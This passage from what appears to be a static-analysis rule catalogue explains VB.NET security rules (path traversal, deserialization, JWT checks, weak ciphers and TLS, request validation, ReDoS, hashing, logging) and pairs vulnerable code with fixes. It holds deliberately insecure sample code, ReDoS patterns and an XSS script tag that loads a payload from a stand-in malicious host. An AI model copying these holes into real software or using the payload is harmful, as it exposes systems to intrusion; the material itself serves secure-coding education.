For Each entry As ZipArchiveEntry In archive.Entries
    ' entry.FullName could contain parent directory references ".." and the destinationPath variable could end up outside of the intended path
    Dim destinationPath As String = Path.GetFullPath(Path.Combine(path, entry.FullName))
    entry.ExtractToFile(destinationPath) ' Sensitive, extracts the entry to a file

    Dim stream As Stream
    stream = entry.Open() ' Sensitive, the entry is about to be extracted
Next

Compliant Solution

Const ThresholdRatio As Double = 10
Const ThresholdSize As Integer = 1024 * 1024 * 1024 ' 1 GB
Const ThresholdEntries As Integer = 10000
Dim TotalSizeArchive, TotalEntryArchive, TotalEntrySize, Cnt As Integer
Dim Buffer(1023) As Byte
Using ZipToOpen As New FileStream("ZipBomb.zip", FileMode.Open), Archive As New ZipArchive(ZipToOpen, ZipArchiveMode.Read)
    For Each Entry As ZipArchiveEntry In Archive.Entries
        Using s As Stream = Entry.Open
            TotalEntryArchive += 1
            TotalEntrySize = 0
            Do
                Cnt = s.Read(Buffer, 0, Buffer.Length)
                TotalEntrySize += Cnt
                TotalSizeArchive += Cnt
                If TotalEntrySize / Entry.CompressedLength > ThresholdRatio Then Exit Do    ' Ratio between compressed and uncompressed data is highly suspicious; looks like a Zip Bomb attack
            Loop While Cnt > 0
        End Using
        If TotalSizeArchive > ThresholdSize Then Exit For       ' The uncompressed data size is too large for the application's resource capacity
        If TotalEntryArchive > ThresholdEntries Then Exit For   ' Too many entries in this archive; can lead to inode exhaustion on the system
    Next
End Using

See

vbnet:S5773

Why is this an issue?

During the deserialization process, the state of an object will be reconstructed from the serialized data stream which can contain dangerous operations.

For example, a well-known attack vector consists in serializing an object of type TempFileCollection with arbitrary files (defined by an attacker) which will be deleted when the application deserializes this object (i.e. when the finalizer of the TempFileCollection object is called). Such types are called "gadgets".

Instead of using BinaryFormatter and similar serializers, it is recommended to use safer alternatives in most cases, such as XmlSerializer or DataContractSerializer. If that is not possible, try to mitigate the risk by restricting the types allowed to be deserialized:

  • by implementing an "allow-list" of types; but keep in mind that novel dangerous types are regularly discovered and this protection could become insufficient over time,
  • and/or by implementing a tamper protection, such as message authentication codes (MAC). This way only objects serialized with the correct MAC hash will be deserialized.

Noncompliant code example

For BinaryFormatter, NetDataContractSerializer, SoapFormatter serializers:

Dim myBinaryFormatter = New BinaryFormatter()
myBinaryFormatter.Deserialize(stream) ' Noncompliant: a binder is not used to limit types during deserialization

JavaScriptSerializer should not use SimpleTypeResolver or other weak resolvers:

Dim serializer1 As JavaScriptSerializer = New JavaScriptSerializer(New SimpleTypeResolver()) ' Noncompliant: SimpleTypeResolver is insecure (every type is resolved)
serializer1.Deserialize(Of ExpectedType)(json)

LosFormatter should not be used without MAC verification:

Dim formatter As LosFormatter = New LosFormatter() ' Noncompliant
formatter.Deserialize(fs)

Compliant solution

BinaryFormatter, NetDataContractSerializer and SoapFormatter serializers should use a binder implementing a whitelist approach to limit types during deserialization (at least one exception should be thrown or a null value returned):

NotInheritable Class CustomBinder
    Inherits SerializationBinder
    Public Overrides Function BindToType(assemblyName As String, typeName As String) As Type
        If Not (Equals(typeName, "type1") OrElse Equals(typeName, "type2") OrElse Equals(typeName, "type3")) Then
            Throw New SerializationException("Only type1, type2 and type3 are allowed") ' Compliant
        End If
        Return Assembly.Load(assemblyName).[GetType](typeName)
    End Function
End Class

Dim myBinaryFormatter = New BinaryFormatter()
myBinaryFormatter.Binder = New CustomBinder()
myBinaryFormatter.Deserialize(stream)

JavaScriptSerializer should use a resolver implementing a whitelist to limit types during deserialization (at least one exception should be thrown or a null value returned):

Public Class CustomSafeTypeResolver
    Inherits JavaScriptTypeResolver
    Public Overrides Function ResolveType(id As String) As Type
        If Not Equals(id, "ExpectedType") Then
            Throw New ArgumentException("Only ExpectedType is allowed during deserialization") ' Compliant
        End If
        Return Type.[GetType](id)
    End Function
End Class

Dim serializer As JavaScriptSerializer = New JavaScriptSerializer(New CustomSafeTypeResolver()) ' Compliant
serializer.Deserialize(Of ExpectedType)(json)

LosFormatter serializer with MAC verification:

Dim formatter As LosFormatter = New LosFormatter(True, secret) ' Compliant
formatter.Deserialize(fs)

Resources

vbnet:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Jwt.Net

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

Imports JWT

Public Sub Decode(decoder As IJwtDecoder)
    Dim decoded As String = decoder.Decode(token, secret, verify:=False) ' Noncompliant
End Sub

Imports JWT

Public Sub Decode()
    Dim decoded As String = New JwtBuilder().
        WithSecret(secret).
        Decode(token) ' Noncompliant
End Sub

Compliant solution

Imports JWT

Public Sub Decode(decoder As IJwtDecoder)
    Dim decoded As String = decoder.Decode(token, secret, verify:=True)
End Sub

When using JwtBuilder, make sure to call MustVerifySignature().

Imports JWT

Public Sub Decode()
    Dim decoded As String = New JwtBuilder().
        WithSecret(secret).
        MustVerifySignature().
        Decode(token)
End Sub

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

vbnet:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker might be able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

Imports System.Security.Cryptography

Public Sub Encrypt()
    Dim SimpleDES As New DESCryptoServiceProvider() ' Noncompliant
End Sub

Compliant solution

Imports System.Security.Cryptography

Public Sub Encrypt()
    Dim AES128ECB = Aes.Create()
End Sub

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.
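A short sketch of configuring AES with an explicit key size (a hedged example; `Aes.Create()` and the `KeySize` property are standard .NET APIs, and AES's block size is fixed at 128 bits):

```vbnet
Imports System.Security.Cryptography

Module StrongCipher
    Sub Configure()
        Using aes = Aes.Create()
            ' Request a 256-bit key explicitly rather than relying on defaults.
            aes.KeySize = 256
        End Using
    End Sub
End Module
```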

Resources

Standards

vbnet:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker might be able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim Algorithm As New AesManaged() With {
            .KeySize = 128,
            .BlockSize = 128,
            .Mode = CipherMode.ECB, ' Noncompliant
            .Padding = PaddingMode.PKCS7
            }
    End Sub
End Module

Example with an asymmetric cipher, RSA:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim data(10) As Byte
        Dim RsaCsp = New RSACryptoServiceProvider()
        RsaCsp.Encrypt(data, False) ' Noncompliant
    End Sub
End Module

Compliant solution

For the AES symmetric cipher, use the GCM mode:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim key(31) As Byte ' AesGcm requires a 128-, 192- or 256-bit key
        Dim Algorithm As New AesGcm(key)
    End Sub
End Module

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim data(10) As Byte
        Dim RsaCsp = New RSACryptoServiceProvider()
        RsaCsp.Encrypt(data, True) ' Compliant: True selects OAEP padding
    End Sub
End Module

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.
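A fuller round-trip sketch with `AesGcm`, showing the nonce and authentication tag that the compliant solution above leaves implicit (sizes follow the standard .NET `AesGcm` API; key and nonce generation here are illustrative):

```vbnet
Imports System.Security.Cryptography
Imports System.Text

Module GcmExample
    Sub RoundTrip()
        Dim key(31) As Byte                 ' 256-bit key
        RandomNumberGenerator.Fill(key)
        Dim nonce(11) As Byte               ' 96-bit nonce, must be unique per message
        RandomNumberGenerator.Fill(nonce)

        Dim plaintext = Encoding.UTF8.GetBytes("hello")
        Dim ciphertext(plaintext.Length - 1) As Byte
        Dim tag(15) As Byte                 ' 128-bit authentication tag

        Using aes As New AesGcm(key)
            aes.Encrypt(nonce, plaintext, ciphertext, tag)
            ' Decrypt verifies the tag and throws if the ciphertext was tampered with.
            Dim decrypted(plaintext.Length - 1) As Byte
            aes.Decrypt(nonce, ciphertext, tag, decrypted)
        End Using
    End Sub
End Module
```

Reusing a nonce with the same key breaks GCM's guarantees, so the nonce must be fresh for every encryption.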

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.
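A minimal sketch using the modern `RSA` base class with OAEP padding (standard .NET APIs; the module and data are illustrative):

```vbnet
Imports System.Security.Cryptography
Imports System.Text

Module OaepExample
    Sub Encrypt()
        Using rsa = RSA.Create(2048)
            Dim data = Encoding.UTF8.GetBytes("secret")
            ' OAEP with SHA-256 instead of the legacy PKCS#1 v1.5 padding.
            Dim ciphertext = rsa.Encrypt(data, RSAEncryptionPadding.OaepSHA256)
        End Using
    End Sub
End Module
```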

Resources

Articles & blog posts

Standards

vbnet:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

These samples pin the connection to TLS 1.0, a protocol version that is considered cryptographically weak.

Imports System.Net
Imports System.Security.Authentication

Public Sub Encrypt()
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls ' Noncompliant
End Sub

Imports System.Net.Http
Imports System.Security.Authentication

Public Sub Encrypt()
    Dim Handler As New HttpClientHandler With {
        .SslProtocols = SslProtocols.Tls ' Noncompliant
    }
End Sub

Compliant solution

Imports System.Net
Imports System.Security.Authentication

Public Sub Encrypt()
    ServicePointManager.SecurityProtocol = _
        SecurityProtocolType.Tls12 _
        Or SecurityProtocolType.Tls13
End Sub

Imports System.Net.Http
Imports System.Security.Authentication

Public Sub Encrypt()
    Dim Handler As New HttpClientHandler With {
        .SslProtocols = SslProtocols.Tls12
    }
End Sub

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The main drawback arises when the framework in use is outdated: its TLS v1.2 settings may still enable older cipher suites that are now considered insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
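An alternative sketch: on modern .NET, `SslProtocols.None` delegates protocol selection to the operating system, which current platforms resolve to TLS 1.2 or 1.3 (this is a common recommendation, but verify it matches your platform's defaults):

```vbnet
Imports System.Net.Http
Imports System.Security.Authentication

Module TlsDefaults
    Sub Configure()
        ' Let the OS pick the strongest available protocol instead of
        ' pinning a version that may age poorly.
        Dim handler As New HttpClientHandler With {
            .SslProtocols = SslProtocols.None
        }
    End Sub
End Module
```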

Resources

Articles & blog posts

Standards

vbnet:S5753

ASP.NET 1.1+ comes with a feature called Request Validation, which prevents the server from accepting content containing un-encoded HTML. This feature acts as a first protection layer against Cross-Site Scripting (XSS) attacks, rejecting requests that potentially contain malicious content, much like a simple Web Application Firewall (WAF).

While this feature is not a silver bullet against all XSS attacks, it helps to catch basic ones. It will, for example, prevent <script type="text/javascript" src="https://malicious.domain/payload.js"> from reaching your controller.

Note: Because the Request Validation feature is only available in ASP.NET, no Security Hotspot is raised for ASP.NET Core applications.

Ask Yourself Whether

  • you do not know the impact of deactivating the Request Validation feature
  • the web application accepts user-supplied data
  • not all user-supplied data is validated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Activate the Request Validation feature for all HTTP requests

Sensitive Code Example

At Controller level:

<ValidateInput(False)>
Public Function Welcome(Name As String) As ActionResult
  ...
End Function

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="false" />
      ...
      <httpRuntime requestValidationMode="0.0" />
   </system.web>
</configuration>

Compliant Solution

At Controller level:

<ValidateInput(True)>
Public Function Welcome(Name As String) As ActionResult
  ...
End Function

or

Public Function Welcome(Name As String) As ActionResult
  ...
End Function

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="true" />
      ...
      <httpRuntime requestValidationMode="4.5" />
   </system.web>
</configuration>

See

vbnet:S4784

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression that is at least 3 characters long and contains at least two instances of any of the following characters: *, +, {.

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine's performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the engine you are using.

If the regular expression is vulnerable to ReDoS attacks, mitigate the risk by using a "match timeout" to limit the time spent running the regular expression.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.
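A minimal sketch of the match-timeout mitigation using the standard `Regex` constructor overload that accepts a timeout (the pattern and input are the examples from this rule; the 100 ms budget is an arbitrary illustration):

```vbnet
Imports System
Imports System.Text.RegularExpressions

Module SafeRegex
    Sub MatchWithTimeout(input As String)
        Try
            ' Bound evaluation time so a pathological input cannot hang the thread.
            Dim r As New Regex("(a+)+b", RegexOptions.None, TimeSpan.FromMilliseconds(100))
            Dim ok = r.IsMatch(input)
        Catch ex As RegexMatchTimeoutException
            ' Treat the input as rejected rather than letting it consume the CPU.
        End Try
    End Sub
End Module
```

The timeout turns a potential denial of service into a handled exception.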

Sensitive Code Example

Imports System
Imports System.Collections.Generic
Imports System.Linq
Imports System.Runtime.Serialization
Imports System.Text.RegularExpressions
Imports System.Web

Namespace N
    Public Class RegularExpression
        Private Sub Foo(ByVal pattern As String, ByVal options As RegexOptions, ByVal matchTimeout As TimeSpan,
                        ByVal input As String, ByVal replacement As String, ByVal evaluator As MatchEvaluator)
            ' All the following instantiations are Sensitive. Validate the regular expression and matched input.
            Dim r As Regex = New System.Text.RegularExpressions.Regex("(a+)+b")
            r = New System.Text.RegularExpressions.Regex("(a+)+b", options)
            r = New System.Text.RegularExpressions.Regex("(a+)+b", options, matchTimeout)

            ' All the following static methods are Sensitive.
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator, options)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator, options, matchTimeout)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement, options)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement, options, matchTimeout)

            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b", options, matchTimeout)
        End Sub
    End Class
End Namespace

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both sides of a "|".

See

vbnet:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like AES, RSA, and SHA should be used instead.

This rule tracks custom implementation of these types from System.Security.Cryptography namespace:

  • AsymmetricAlgorithm
  • AsymmetricKeyExchangeDeformatter
  • AsymmetricKeyExchangeFormatter
  • AsymmetricSignatureDeformatter
  • AsymmetricSignatureFormatter
  • DeriveBytes
  • HashAlgorithm
  • ICryptoTransform
  • SymmetricAlgorithm

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

Public Class CustomHash     ' Noncompliant
    Inherits HashAlgorithm

    Private fResult() As Byte

    Public Overrides Sub Initialize()
        fResult = Nothing
    End Sub

    Protected Overrides Function HashFinal() As Byte()
        Return fResult
    End Function

    Protected Overrides Sub HashCore(array() As Byte, ibStart As Integer, cbSize As Integer)
        fResult = If(fResult, array.Take(8).ToArray)
    End Sub

End Class

Compliant Solution

Dim mySHA256 As SHA256 = SHA256.Create()

See

vbnet:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512 and SHA-3, are recommended. For password hashing, it’s even better to use algorithms that are deliberately slow to compute, such as bcrypt, scrypt, argon2 or pbkdf2, because they slow down brute force attacks.
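A minimal password-hashing sketch using PBKDF2 via the standard `Rfc2898DeriveBytes` class (the iteration count and output length are illustrative; tune them to current guidance for your environment):

```vbnet
Imports System.Security.Cryptography

Module PasswordHashing
    Function HashPassword(password As String) As Byte()
        Dim salt(15) As Byte                ' 128-bit random salt, stored with the hash
        RandomNumberGenerator.Fill(salt)
        ' PBKDF2 with a high iteration count to make brute force expensive.
        Using kdf As New Rfc2898DeriveBytes(password, salt, 600000, HashAlgorithmName.SHA256)
            Return kdf.GetBytes(32)
        End Using
    End Function
End Module
```

The salt must be stored alongside the derived hash so the same computation can be repeated at login time.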

Sensitive Code Example

Imports System.Security.Cryptography

Sub ComputeHash()

    ' Review all instantiations of classes that inherit from HashAlgorithm, for example:
    Dim hashAlgo As HashAlgorithm = HashAlgorithm.Create() ' Sensitive
    Dim hashAlgo2 As HashAlgorithm = HashAlgorithm.Create("SHA1") ' Sensitive
    Dim sha As SHA1 = New SHA1CryptoServiceProvider() ' Sensitive
    Dim md5 As MD5 = New MD5CryptoServiceProvider() ' Sensitive

    ' ...
End Sub

Class MyHashAlgorithm
    Inherits HashAlgorithm ' Sensitive

    ' ...
End Class

Compliant Solution

Imports System.Security.Cryptography

Sub ComputeHash()
    Dim sha256 = New SHA256CryptoServiceProvider() ' Compliant
    Dim sha384 = New SHA384CryptoServiceProvider() ' Compliant
    Dim sha512 = New SHA512CryptoServiceProvider() ' Compliant

    ' ...
End Sub

See

vbnet:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most often start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on what information is logged and how it is logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into the logs every time a user performs an action, and the user can perform that action as many times as they want.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The logger’s level (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backed up or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose a log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers, but also any personal information such as user names, locations, etc. Usually, any information which is protected by law is a good candidate for removal.
  • Sanitize all user inputs before writing them to the logs. This includes checking their size, content, encoding, syntax, etc. As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

.Net Core: configure programmatically

Imports System
Imports System.Collections
Imports System.Collections.Generic
Imports Microsoft.AspNetCore
Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting
Imports Microsoft.Extensions.Configuration
Imports Microsoft.Extensions.DependencyInjection
Imports Microsoft.Extensions.Logging
Imports Microsoft.Extensions.Options

Namespace MvcApp

    Public Class ProgramLogging

        Public Shared Function CreateWebHostBuilder(args As String()) As IWebHostBuilder

            WebHost.CreateDefaultBuilder(args) _
                .ConfigureLogging(Sub(hostingContext, logging) ' Sensitive
                                      ' ...
                                  End Sub) _
            .UseStartup(Of StartupLogging)()

            '...
        End Function
    End Class


    Public Class StartupLogging

        Public Sub ConfigureServices(services As IServiceCollection)

            services.AddLogging(Sub(logging) ' Sensitive
                                    '...
                                End Sub)
        End Sub

        Public Sub Configure(app As IApplicationBuilder, env As IHostingEnvironment, loggerFactory As ILoggerFactory)

            Dim config As IConfiguration = Nothing
            Dim level As LogLevel = LogLevel.Critical
            Dim includeScopes As Boolean = False
            Dim filter As Func(Of String, Microsoft.Extensions.Logging.LogLevel, Boolean) = Nothing
